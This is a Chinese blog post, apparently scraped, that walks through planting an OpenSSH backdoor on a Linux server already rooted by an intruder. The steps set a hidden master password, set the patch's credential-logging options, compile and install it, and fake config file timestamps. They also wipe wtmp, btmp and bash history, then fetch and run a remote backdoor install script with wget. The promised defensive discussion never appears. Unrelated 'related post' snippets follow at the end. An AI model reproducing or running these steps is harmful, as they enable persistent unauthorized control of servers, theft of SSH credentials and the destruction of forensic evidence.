linux安装openssh 密码错误,Linux安装openssh的后门补丁
相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测,本文就如何添加OpenSSH后门以及防范后门添加进行探讨。
1,补丁下载:
2,解压后文件修改记录日志及密码
# cd openssh-5.9p1
# openssl rand 6 -base64 随机生成密码
h7SWmK1V
# vim includes.h
#define ILOG "/tmp/ilog" 修改为空
#define OLOG "/tmp/olog" 修改为空
#define SECRETPW "system" 修改需要登录的密码h7SWmK1V
3,安装相关依赖
#yum install openssl openssl-devel pam-devel -y
4,备份原有配置文件
#cp -p /etc/ssh/sshd_config{,.bak}
5,编译安装
#./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5 && make && make install
6,恢复之前文件的创建时间
# cd /etc/ssh/
#touch -r sshd_config.bak ssh_config
7,重载登录
#service sshd reload
8,删除记录
删除ssh补丁包
# rm -rf openssh-5.9p1*
删除部分记录
#echo ""> /var/log/wtmp
#echo ""> /var/log/btmp
#echo ""> ./.bash_history
删除或者隐藏原本sshd配置文件
#mv sshd_config.bak .sshd_config.bak
脚本安装:
#wget https://raw.githubusercontent.com/yeohZhou/neiwang/master/sshBackdoorinsatll.sh --no-check
#mv sshBackdoorinsatll.sh/var/tmp/
#cd/var/tmp#chmod+x sshBackdoorinsatll.sh#ssh-V#./sshBackdoorinsatll.shOpenSSH_4.3p2#/etc/init.d/sshd restart
linux安装openssh 密码错误,Linux安装openssh的后门补丁相关推荐
- 远程连接kali linux一直提示密码错误的解决方法
远程连接kali linux一直提示密码错误的解决方法 问题描述 问题描述 最近在用SecureCRT连接kali linu虚拟机的时候一直提示我密码错误,开始以为是我输入错误,后来多试了很多次依旧提 ...
- linux安装源文件出现错误,编译安装源码时出现错误的解决方法
由于软件更新速度比较快,所以我们经常需要自己动手去编译安装一个软件,但是编译安装时难免不出现错误,像LAMP,LNMP在好多平台我都是手动编译的,也出现过不少错误,以下总结编译安装出现错误时的解决方法 ...
- 在linux下 用户的密码错误,linux中root用户密码错误如何解决
linux中root用户密码错误如何解决 发布时间:2020-04-27 10:53:03 来源:亿速云 阅读:230 作者:小新 今天小编给大家分享的是linux中root用户密码错误如何解决,相信 ...
- linux怎么创建新用户名和密码错误,linux重命名root后,使用su命令切换新用户时,提示密码错误...
1.考虑到安全因素,用户希望把服务器上的root用户进行重命名,于是把/etc/passwd文件和/etc/shadow文件中的root修改为xxx.修改完毕后,测试正常,普通用户可以通过su - x ...
- linux文件给另一用户名和密码错误,linux重命名root后,使用su命令切换新用户时,提示密码错误...
1.考虑到安全因素,用户希望把服务器上的root用户进行重命名,于是把/etc/passwd文件和/etc/shadow文件中的root修改为xxx.修改完毕后,测试正常,普通用户可以通过su - x ...
- mysql 6安装当前密码_MySQL8.0 安装踩坑指南
就在昨天上午,刚为云服务器安装好Apache2.4.33和PHP7.2.4环境,准备再来一个最新的MySQL5.7.22.寻找5.7版本的rpm包时下到mysql80xxx.rpm,看人家的教程是my ...
- Linux启动检测内存条错误,linux检测程序内存泄漏和内存错误
在linux的开发程序的时候,可以很方便的使用valgrind这个工具方便检测内存泄漏和内存错误. 安装很方便: debian(如ubuntu) sudo apt-get install valgri ...
- linux 登录 忘记密码,redhat linux忘记登陆密码之解决办法
redhat linux忘记登陆密码之解决办法 很简单的一个技巧,给大家介绍一下 在这个界面 按任意键 按 e键(编辑命令之前启动) 选择第二项 在按e键(修改选定的命令在启动) 输入single ( ...
- linux改用户密码chpasswd,Linux chpasswd (批量或单一修改用户密码)和passwd(直接修改用户密码)...
Linux命令:chpasswd 批量或者单一修改用户密码 语法: 1:# echo 用户名:密码 | chpasswd 2:# chpasswd < doiido.txt 实例 1.直接修改d ...
最新文章
- Java list三种遍历方法性能比较
- MyBatis——Java API
- shell脚本中执行 source /etc/profile 或者 source ~/.bashrc 不能生效的原因
- $.post请求的参数在后台代码中得到为null_996难得休息,小伙打开steam网页看了一款游戏,输入密码后却习惯性按了F12研究起了JS代码...
- linux push path,Linux系统shell使用几点摘录(二)
- 【poj1088 记忆话搜索】
- SAP Cloud for Customer的work center显示逻辑
- can总线报文是固定的吗_新能源汽车CAN总线Bus Off处理流程
- 即时通讯软件开发界公认的说法
- python opencv 找到圆点标定板所有点后通过距离找四个角点2
- 用两种while循环求2的n次方,n是传入的值。
- 计算机配置很不错但是卡,高手告诉你win10电脑明明配置很好却卡顿的详尽处理手法...
- C语言读取txt文件
- 基于Unity引擎利用OpenCV和MediaPipe的面部表情和人体运动捕捉系统
- 【移动端聊天功能模板】Vue实现H5聊天系统,实现上下固定中间滚动布局,微信授权功能,自动滚动到底部【详细注释,一看就会】
- hihocoder 第三周
- #用vant 写三级联动
- 如何在国内不翻墙访问youtube等网站,绝对有用可靠安全不违法违规并且稳定有效(*^_^*)
- php获取抖音数据,抖音数据采集
- 如何验签名真伪?法大大手写签名识别功能来了!